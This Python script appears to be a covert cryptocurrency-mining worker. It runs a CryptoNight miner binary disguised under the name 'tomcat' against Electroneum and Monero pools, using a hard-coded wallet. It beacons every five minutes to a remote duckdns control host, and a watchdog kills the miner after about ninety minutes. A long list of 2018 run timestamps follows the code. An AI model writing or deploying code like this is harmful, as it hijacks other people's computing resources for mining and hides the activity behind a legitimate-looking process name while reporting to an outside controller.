import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:06.718054
#2018-02-17 16:52:04.036634
#2018-02-17 18:40:03.180812
#2018-02-17 20:28:05.329033
#2018-02-17 22:16:04.188061
#2018-02-18 00:00:06.965918
#2018-02-18 01:51:03.647726
#2018-02-18 03:38:05.066987
#2018-02-18 05:24:01.824375
#2018-02-18 07:16:07.846169
#2018-02-18 09:03:04.925532
#2018-02-18 10:50:06.711503
#2018-02-18 12:38:05.906741
#2018-02-18 14:24:06.640730
#2018-02-18 16:15:04.418796
#2018-02-18 18:03:05.708716
#2018-02-18 19:50:02.101389
#2018-02-18 21:36:05.981923
#2018-02-18 23:24:01.936906
#2018-02-19 01:11:04.025659
#2018-02-19 02:57:01.279869
#2018-02-19 04:44:06.449435
#2018-02-19 06:27:04.849686
#2018-02-19 08:17:01.628621
#2018-02-19 10:06:06.586537
#2018-02-19 11:55:02.970052
#2018-02-19 13:42:06.609519
#2018-02-19 15:32:03.918122
#2018-02-19 17:20:08.502286
#2018-02-19 19:09:08.058554
#2018-02-19 20:56:01.867707
#2018-02-19 22:44:06.624789
#2018-02-20 00:28:05.754105
#2018-02-20 02:16:08.202399
#2018-02-20 04:09:01.480170
#2018-02-20 05:52:05.817280
#2018-02-20 07:38:01.972979
#2018-02-20 09:22:01.923682
#2018-02-20 11:06:01.582854
#2018-02-20 12:52:06.948198
#2018-02-20 14:38:09.928206
#2018-02-20 16:22:07.868200
#2018-02-20 18:10:08.347489
#2018-02-20 20:03:06.629185
#2018-02-20 21:51:07.171292
#2018-02-20 23:34:08.256970
#2018-02-21 01:18:07.242743
#2018-02-21 03:05:08.445731
#2018-02-21 04:52:07.045925
#2018-02-21 06:39:16.372279
#2018-02-21 08:25:02.393925
#2018-02-21 10:11:04.643028
#2018-02-21 11:59:01.456208
#2018-02-21 13:48:11.363674
#2018-02-21 15:27:01.768289
#2018-02-21 17:18:05.500704
#2018-02-21 19:05:05.887632
#2018-02-21 20:53:08.438873
#2018-02-21 22:38:07.802123
#2018-02-22 00:26:01.960885
#2018-02-22 02:16:05.543187
#2018-02-22 04:01:08.132928
#2018-02-22 05:49:06.580169
#2018-02-22 07:34:06.512112
#2018-02-22 09:22:08.531089
#2018-02-22 11:08:02.225630
#2018-02-22 12:54:04.978092
#2018-02-22 14:42:01.512136
#2018-02-22 16:28:09.317492
#2018-02-22 18:16:11.256992
#2018-02-22 20:06:07.863625
#2018-02-22 21:54:07.386502
#2018-02-22 23:41:01.776126
#2018-02-23 01:28:06.781509
#2018-02-23 03:16:01.312750
#2018-02-23 05:04:08.101819
#2018-02-23 06:48:06.045148
#2018-02-23 08:39:07.619837
#2018-02-23 10:54:03.515271
#2018-02-23 12:51:09.478968
#2018-02-23 14:34:09.107745
#2018-02-23 16:25:04.005444
#2018-02-23 18:13:04.254053
#2018-02-23 19:59:02.172645
#2018-02-23 21:43:01.736987
#2018-02-23 23:36:01.663533
#2018-02-24 01:25:05.493105
#2018-02-24 03:16:06.818515
#2018-02-24 05:01:03.678672
#2018-02-24 06:50:08.959135
#2018-02-24 08:32:05.868757
#2018-02-24 10:20:03.624046
#2018-02-24 12:15:06.670466
#2018-02-24 14:04:05.121142
#2018-02-24 15:52:05.703110
#2018-02-24 17:46:05.082917
#2018-02-24 19:36:01.254121
#2018-02-24 21:23:07.342394
#2018-02-25 01:18:07.576764
#2018-02-25 05:18:07.001269
#2018-02-25 11:28:01.628855